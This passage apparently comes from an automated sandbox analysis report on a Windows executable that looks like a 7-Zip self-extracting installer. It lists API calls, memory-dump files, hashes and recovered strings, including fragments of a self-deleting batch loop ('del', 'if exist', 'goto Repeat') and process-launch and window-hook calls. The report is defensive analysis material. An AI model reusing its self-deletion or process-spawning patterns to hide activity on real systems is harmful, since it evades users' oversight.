                                                                    • Opcode Fuzzy Hash: 59554f6d9bca7902a0271ca2f41497f45a9e4576255c66063583f637390c7374
                                                                    • Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
                                                                    • lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
                                                                    • lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
                                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
                                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                    • String ID:
                                                                    • API String ID: 1862581289-0
                                                                    • Opcode ID: 2ac07a319478a49a5ac37af05ddfbc625e213cb6d38eec3af251fca2d70d8ada
                                                                    • Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
                                                                    • Opcode Fuzzy Hash: 2ac07a319478a49a5ac37af05ddfbc625e213cb6d38eec3af251fca2d70d8ada
                                                                    • Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040864F
                                                                    • SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00408669
                                                                    • SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
                                                                    • EndDialog.USER32(?,00000000), ref: 0040869A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentHookThreadWindows$Dialog
                                                                    • String ID:
                                                                    • API String ID: 1967849563-0
                                                                    • Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
                                                                    • Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
                                                                    • Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
                                                                    • FreeSid.ADVAPI32(?), ref: 004024A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
                                                                    • Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
                                                                    • Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
                                                                    • Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
                                                                    • Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                    • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                    • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                    • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                    • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                    • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                    • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                    • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                    • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                    APIs
                                                                    • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                                    • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                    • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                    • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                    • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                    • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                    • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                    • String ID: " -$sfxwaitall
                                                                    • API String ID: 2734624574-3991362806
                                                                    • Opcode ID: 63930edcd67e25ccf09d7e43436606dce1ade80320862e26f9056340c9b1cd63
                                                                    • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                    • Opcode Fuzzy Hash: 63930edcd67e25ccf09d7e43436606dce1ade80320862e26f9056340c9b1cd63
                                                                    • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                    APIs
                                                                    • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                    • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                    • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                    • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                    • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                    • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                    • API String ID: 3007203151-3467708659
                                                                    • Opcode ID: 024ca1496686e6a438e05d5d6dd2e21180d542993e08a8bf41a3ecf294dc3b55
                                                                    • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                    • Opcode Fuzzy Hash: 024ca1496686e6a438e05d5d6dd2e21180d542993e08a8bf41a3ecf294dc3b55
                                                                    • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                                    APIs
                                                                    • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                    • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                      • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                      • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                    • GetParent.USER32(?), ref: 0040319B
                                                                    • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                    • GetMenu.USER32(?), ref: 004031C2
                                                                    • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                    • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                    • DestroyWindow.USER32(?), ref: 00403210
                                                                    • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                    • GetSysColor.USER32(0000000F), ref: 00403229
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                    • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                    • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                    • API String ID: 3514532227-2281146334
                                                                    • Opcode ID: e102d8aa265157ceba963917365e781f2d4fd1c47071781b891979077b6edaf4
                                                                    • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                    • Opcode Fuzzy Hash: e102d8aa265157ceba963917365e781f2d4fd1c47071781b891979077b6edaf4
                                                                    • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                    • LoadIconW.USER32(00000000), ref: 00408717
                                                                    • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                    • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                    • LoadImageW.USER32(00000000), ref: 0040873C
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                    • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                    • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                    • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                    • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                    • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                    • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                    • LoadIconW.USER32(00000000), ref: 0040895E
                                                                    • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                    • SendMessageW.USER32(00000000), ref: 00408980
                                                                      • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                      • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                    • String ID:
                                                                    • API String ID: 3694754696-0
                                                                    • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                    • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                    • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                    • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                    APIs
                                                                    • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
                                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                    • _wtol.MSVCRT ref: 00404CDF
                                                                    • _wtol.MSVCRT ref: 00404CFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                    • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                    • API String ID: 2725485552-1675048025
                                                                    • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                    • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                    • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                    APIs
                                                                    • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                    • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                    • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
